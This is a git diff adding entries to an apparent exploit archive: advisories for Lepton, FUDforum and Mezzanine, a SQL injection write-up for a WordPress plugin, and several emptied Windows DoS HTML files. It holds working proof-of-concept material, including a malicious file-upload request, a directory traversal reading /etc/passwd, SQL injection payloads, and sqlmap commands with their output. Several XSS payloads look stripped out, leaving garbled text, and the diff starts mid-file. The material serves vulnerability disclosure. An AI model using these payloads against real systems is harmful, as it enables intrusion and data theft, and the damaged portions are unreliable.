Vendor releases fix +11/10/2016 Disclosed to public + + +Blog Reference: +https://www.curesec.com/blog/article/blog/Lepton-222-SQL-Injection-173.html + +-- +blog: https://www.curesec.com/blog +tweet: https://twitter.com/curesec + +Curesec GmbH +Curesec Research Team +Josef-Orlopp-Straße 54 +10365 Berlin, Germany \ No newline at end of file diff --git a/platforms/php/webapps/40801.txt b/platforms/php/webapps/40801.txt new file mode 100755 index 000000000..7fde98747 --- /dev/null +++ b/platforms/php/webapps/40801.txt @@ -0,0 +1,80 @@ +Security Advisory - Curesec Research Team + +1. Introduction + +Affected Product: LEPTON 2.2.2 stable +Fixed in: 2.3.0 +Fixed Version Link: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php +Vendor Website: http://www.lepton-cms.org/ +Vulnerability Type: Code Execution +Remote Exploitable: Yes +Reported to vendor: 09/05/2016 +Disclosed to 11/10/2016 +public: +Release mode: Coordinated Release +CVE: n/a +Credits Tim Coen of Curesec GmbH + +2. Overview + +Lepton is a content management system written in PHP. In version 2.2.2, it is +vulnerable to code execution as it is possible to upload files with dangerous +type via the media manager. + +3. Details + +Upload of file with dangerous type + +CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C + +Description: When uploading a file in the media tab, there is a client-side as +well as a server-side extension check. The server-side check can be bypassed by +including a valid extension before the desired extension, leading to code +execution or XSS. + +Proof of Concept: + +POST /LEPTON_stable_2.2.2/upload/admins/media/index.php?leptoken= +099c871bbf640f2f91d2az1472132032 HTTP/1.1 Host: localhost Accept-Language: +en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: lep9131sessionid= +8bgkd5rae5nhbn0jaac8jpkpc5 Connection: close Content-Type: multipart/form-data; +boundary=---------------------------38397165016927337851258279296 +Content-Length: 613 -----------------------------38397165016927337851258279296 +Content-Disposition: form-data; name="action" media_upload +-----------------------------38397165016927337851258279296 Content-Disposition: +form-data; name="current_dir" +-----------------------------38397165016927337851258279296 Content-Disposition: +form-data; name="upload[]"; filename="test.png.php5" Content-Type: image/png .jpg When the recipient views the PM, the injected code will +be executed. + +XSS 2: Via Filename in Forum Posts + +CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N + +Description: The filename of attached images in forum posts is vulnerable to +persistent XSS. + +Proof of Concept: + +Create a new forum post. Add an attachment, where the filename is: '">.jpg When viewing the post the injected code will be +executed. + +XSS 3: Via Signature in User Profile + +CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N + +Description: When editing a profile, the signature is echoed unencoded, leading +to persistent XSS. + +Proof of Concept: + +Visit http://localhost/fudforum/index.php?t=register as signature, use '"> The injected code is either executed +when the user themselves edits their profile - which may be exploited via login +CSRF - or when an admin visits the edit profile page located here: http:// +localhost/fudforum/index.php?t=register&mod_id=6&&SQ= +1a85a858f326ec6602cb6d78d698f60a + +Login CSRF + +CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N + +Description: The login of FUDForum does not have any CSRF protection. The +impact of this is low, but an attacker might get a victim to disclose sensitive +information by using CSRF to log the victim into an attacker-controlled +account. An example would be the accidental sending of a sensitive private +message while being logged into an account controlled by an attacker. +Additionally, Login-CSRF may enable an attacker to exploit XSS issues in the +user area. + +Proof of Concept: + +
+ +4. Solution + +This issue was not fixed by the vendor. + +5. Report Timeline + +04/11/2016 Informed Vendor about Issue (no reply) +09/14/2016 Reminded Vendor (no reply) +11/10/2016 Disclosed to public + + +Blog Reference: +https://www.curesec.com/blog/article/blog/FUDforum-306-Multiple-Persistent-XSS-amp-Login-CSRF-169.html + +-- +blog: https://www.curesec.com/blog +tweet: https://twitter.com/curesec + +Curesec GmbH +Curesec Research Team +Josef-Orlopp-Straße 54 +10365 Berlin, Germany diff --git a/platforms/php/webapps/40803.txt b/platforms/php/webapps/40803.txt new file mode 100755 index 000000000..8f40648df --- /dev/null +++ b/platforms/php/webapps/40803.txt @@ -0,0 +1,58 @@ +Security Advisory - Curesec Research Team + +1. Introduction + +Affected Product: FUDforum 3.0.6 +Fixed in: not fixed +Fixed Version Link: n/a +Vendor Website: http://fudforum.org/forum/ +Vulnerability Type: LFI +Remote Exploitable: Yes +Reported to vendor: 04/11/2016 +Disclosed to public: 11/10/2016 +Release mode: Full Disclosure +CVE: n/a +Credits Tim Coen of Curesec GmbH + +2. Overview + +FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable +to local file inclusion. This allows an attacker to read arbitrary files that +the web user has access to. + +Admin credentials are required. + +3. Details + +CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N + +Description: The "file" parameter of the hlplist.php script is vulnerable to +directory traversal, which allows the viewing of arbitrary files. + +Proof of Concept: + +http://localhost/fudforum/adm/hlplist.php?tname=default&tlang=./af&&SQ= +4b181ea1d2d40977c7ffddb8a48a4724&file=../../../../../../../../../../etc/passwd + +4. Solution + +This issue was not fixed by the vendor. + +5. Report Timeline + +04/11/2016 Informed Vendor about Issue (no reply) +09/14/2016 Reminded Vendor (no reply) +11/10/2016 Disclosed to public + + +Blog Reference: +https://www.curesec.com/blog/article/blog/FUDforum-306-LFI-167.html + +-- +blog: https://www.curesec.com/blog +tweet: https://twitter.com/curesec + +Curesec GmbH +Curesec Research Team +Josef-Orlopp-Straße 54 +10365 Berlin, Germany \ No newline at end of file diff --git a/platforms/php/webapps/40804.txt b/platforms/php/webapps/40804.txt new file mode 100755 index 000000000..71455c46c --- /dev/null +++ b/platforms/php/webapps/40804.txt @@ -0,0 +1,126 @@ +# Exploit Title: Olimometer Plugin for WordPress – Sql Injection +# Date: 14/11/2016 +# Exploit Author: TAD GROUP +# Vendor Homepage: https://wordpress.org/plugins/olimometer/ +# Software Link: https://wordpress.org/plugins/olimometer/ +# Contact: info@tad.bg +# Website: http://tad.bg +# Category: Web Application Exploits +# Tested on: Debian 8 + + +1 - Description + +# Vulnerable parameter: olimometer_id= + +Parameter: olimometer_id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: olimometer_id=1 AND 6227=6227 + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: olimometer_id=1 AND SLEEP(5) + +Using GET SQL Method with the "olimometer_id" parameter, we were able to +get the database name from the EXAMPLE.COM website . By further running +SQL Map using different arguments, we would be able to get the complete +database, including usernames and passwords if there are such. + +2. Proof of Concept + +Using the website EXAMPLE.COM for example, we can fire up sqlmap and set +the full path to the vulnerable parameter: + +root@kali:~# sqlmap -u +http://EXAMPLE.COM/wp-content/plugins/olimometer/thermometer.php?olimometer_ +id=1 +--dbs --threads=5 --random-agent --no-cast + +--- +Parameter: olimometer_id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: olimometer_id=1 AND 6227=6227 + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: olimometer_id=1 AND SLEEP(5) +--- +[11:14:21] [INFO] the back-end DBMS is MySQL +web application technology: Nginx +back-end DBMS: MySQL >= 5.0.12 +[11:14:21] [INFO] fetching database names +[11:14:21] [INFO] fetching number of databases +[11:14:21] [INFO] retrieved: +[11:14:21] [WARNING] multi-threading is considered unsafe in time-based +data retrieval. Going to switch it off automatically +[11:14:21] [WARNING] (case) time-based comparison requires larger +statistical model, please wait.............................. (done) +[11:14:26] [WARNING] it is very important to not stress the network +adapter during usage of time-based payloads to prevent potential disruptions +[11:14:26] [ERROR] unable to retrieve the number of databases +[11:14:26] [INFO] falling back to current database +[11:14:26] [INFO] fetching current database +[11:14:26] [INFO] retrieving the length of query output +[11:14:26] [INFO] retrieved: +[11:14:28] [INFO] heuristics detected web page charset 'ascii' +14 +[11:15:26] [INFO] retrieved: *****_wrdp1 +available databases [1]: +[*] *****_wrdp1 + +We can see that we have successfully discovered one available database +with the name: "*****_wrdp1" + +3. Type of vulnerability: + +An SQL Injection vulnerability in Olimometer allows attackers to read +arbitrary data from the database. + +4. Exploitation vector: + +The url parameter 'olimometer_id=' of the +/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1 is +vulnerable to SQLI. + +5. Attack outcome: + +An attacker can read arbitrary data from the database. If the webserver +is misconfigured, read & write access the filesystem may be possible. + +6. Impact: + +Critical + +7. Software/Product name: + +Olimometer Plugin for WordPress + +8. Affected versions: + +<= 2.56 + +9. Fixed in version: + +Not fixed at the date of submitting that exploit. + +10. Vendor: + +oshingler + +11. CVE number: + +Not existing + + +-- +Ivan Todorov | Иван Тодоров + +TAD GROUP | ТАД ГРУП +CEO | Изпълнителен Директор +www.tad.bg | +359 877 123456 +Самоков 28А, офис 6.2 | 1000 София | България +Samokov 28А, office 6.2 | 1000 Sofia | Bulgaria + + diff --git a/platforms/python/webapps/40799.txt b/platforms/python/webapps/40799.txt new file mode 100755 index 000000000..e29a7390f --- /dev/null +++ b/platforms/python/webapps/40799.txt @@ -0,0 +1,80 @@ +Security Advisory - Curesec Research Team + +1. Introduction + +Affected Product: Mezzanine 4.2.0 +Fixed in: 4.2.1 +Fixed Version Link: https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1 +Vendor Website: http://mezzanine.jupo.org/ +Vulnerability Type: XSS +Remote Exploitable: Yes +Reported to vendor: 09/05/2016 +Disclosed to public: 11/10/2016 +Release mode: Coordinated Release +CVE: n/a +Credits Tim Coen of Curesec GmbH + +2. Overview + +Mezzanine is an open source CMS written in python. In version 4.2.0, it is +vulnerable to two persistent XSS attacks, one of which requires extended +privileges, the other one does not. These issues allow an attacker to steal +cookies, inject JavaScript keyloggers, or bypass CSRF protection. + +3. Details + +XSS 1: Persistent XSS via Name in Comments + +CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N + +Description: When leaving a comment on a blog post, the author name is echoed +unencoded in the backend, leading to persistent XSS. + +Proof of Concept: + +Leave a comment, as author name use '"> To trigger +the payload, view the comment overview in the admin backend: http:// +localhost:8000/admin/generic/threadedcomment + +XSS 2: Persistent XSS via HTML file upload + +CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N + +Description: When uploading files via the media manager, the extension .html is +allowed, leading to XSS via file upload. An account with the permissions to +upload files to the media manager is required. + +Proof of Concept: + +Visit the media manager and upload a .html file: http://localhost:8000/admin/ +media-library/upload/?ot=desc&o=date As uploaded files are stored inside the +web root, it can now be accessed, thus executing the JavaScript code it +contains: http://localhost:8000/static/media/uploads/xss.html + +4. Solution + +To mitigate this issue please upgrade at least to version 4.2.1: + +https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1 + +Please note that a newer version might already be available. + +5. Report Timeline + +09/05/2016 Informed Vendor about Issue +09/05/2016 Vendor replies +09/19/2016 Vendor releases fix +11/10/2016 Disclosed to public + + +Blog Reference: +https://www.curesec.com/blog/article/blog/Mezzanine-420-XSS-177.html + +-- +blog: https://www.curesec.com/blog +tweet: https://twitter.com/curesec + +Curesec GmbH +Curesec Research Team +Josef-Orlopp-Straße 54 +10365 Berlin, Germany \ No newline at end of file diff --git a/platforms/windows/dos/40793.html b/platforms/windows/dos/40793.html new file mode 100755 index 000000000..2d2b7bf55 --- /dev/null +++ b/platforms/windows/dos/40793.html @@ -0,0 +1,98 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/40797.html b/platforms/windows/dos/40797.html new file mode 100755 index 000000000..061d40be6 --- /dev/null +++ b/platforms/windows/dos/40797.html @@ -0,0 +1,89 @@ + + + + + + A&#x­D;&#x­D;B + + + \ No newline at end of file diff --git a/platforms/windows/dos/40798.html b/platforms/windows/dos/40798.html new file mode 100755 index 000000000..b972b1ab7 --- /dev/null +++ b/platforms/windows/dos/40798.html @@ -0,0 +1,49 @@ + + + + + + + + \ No newline at end of file